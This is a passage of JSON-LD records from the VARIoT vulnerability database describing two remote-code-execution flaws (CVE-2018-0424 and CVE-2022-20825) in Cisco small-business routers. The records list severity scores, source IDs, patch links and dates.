            "id": "JVNDB-2018-010839"
          }
        ]
      },
      "cve": "CVE-2018-0424",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2018-0424",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-18073",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-118626",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2018-0424",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2018-0424",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-0424",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-0424",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-18073",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201809-263",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-118626",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118626"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0424"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input to scripts by the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary commands with the privileges of the root user. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router. The vulnerability stems from a failure to validate data entered by the user",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-0424"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118626"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-0424",
            "trust": 3.1
          },
          {
            "db": "SECTRACK",
            "id": "1041677",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-263",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-118626",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118626"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0424"
          }
        ]
      },
      "id": "VAR-201810-0302",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118626"
          }
        ],
        "trust": 1.2914166040000001
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          }
        ]
      },
      "last_update_date": "2024-11-23T23:08:34.523000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20180905-rv-routers-injection",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-rv-routers-injection"
          },
          {
            "title": "CiscoRV110W, RV130W, RV215W Command Injection Vulnerability Patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/139761"
          },
          {
            "title": "Cisco RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router  and RV215W Wireless-N VPN Router Fixes for command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=84594"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-77",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-78",
            "trust": 1.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-118626"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0424"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180905-rv-routers-injection"
          },
          {
            "trust": 1.7,
            "url": "http://www.securitytracker.com/id/1041677"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0424"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0424"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118626"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0424"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118626"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0424"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-09-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "date": "2018-10-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-118626"
          },
          {
            "date": "2018-12-25T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "date": "2018-09-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          },
          {
            "date": "2018-10-05T14:29:00.967000",
            "db": "NVD",
            "id": "CVE-2018-0424"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-09-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "date": "2020-08-28T00:00:00",
            "db": "VULHUB",
            "id": "VHN-118626"
          },
          {
            "date": "2018-12-25T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          },
          {
            "date": "2024-11-21T03:38:12.013000",
            "db": "NVD",
            "id": "CVE-2018-0424"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco Command injection vulnerability in the product",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202206-1301

    Vulnerability from variot - Updated: 2024-11-23 23:07

    A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient user input validation of incoming HTTP packets. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface. A successful exploit could allow the attacker to execute arbitrary commands on an affected device using root-level privileges. Cisco has not released software updates that address this vulnerability. plural Cisco Small Business Router products contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Cisco Small Business is a switch of Cisco (Cisco) in the United States

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202206-1301",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv215w wireless-n vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20825"
          }
        ]
      },
      "cve": "CVE-2022-20825",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2022-20825",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2022-55682",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20825",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20825",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20825",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20825",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20825",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2022-55682",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202206-1532",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20825",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20825"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-1532"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20825"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20825"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient user input validation of incoming HTTP packets. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface. A successful exploit could allow the attacker to execute arbitrary commands on an affected device using root-level privileges. Cisco has not released software updates that address this vulnerability. plural Cisco Small Business Router products contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Cisco Small Business is a switch of Cisco (Cisco) in the United States",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20825"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20825"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20825",
            "trust": 3.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2022.2966",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-1532",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20825",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20825"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-1532"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20825"
          }
        ]
      },
      "id": "VAR-202206-1301",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          }
        ],
        "trust": 1.2119198979999999
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          }
        ]
      },
      "last_update_date": "2024-11-23T23:07:19.389000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-sb-rv-overflow-s2r82P9v",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-overflow-s2r82P9v"
          },
          {
            "title": "Patch for Denial of Service Vulnerabilities in Multiple Cisco Small Business Products",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/340056"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=247274"
          },
          {
            "title": "Cisco: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Remote Command Execution and Denial of Service Vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-sb-rv-overflow-s2r82P9v"
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20825"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-1532"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20825"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.0,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-rv-overflow-s2r82p9v"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20825"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-20825/"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2022.2966"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/alphabugx/cve-2022-23305"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20825"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-1532"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20825"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20825"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-1532"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20825"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
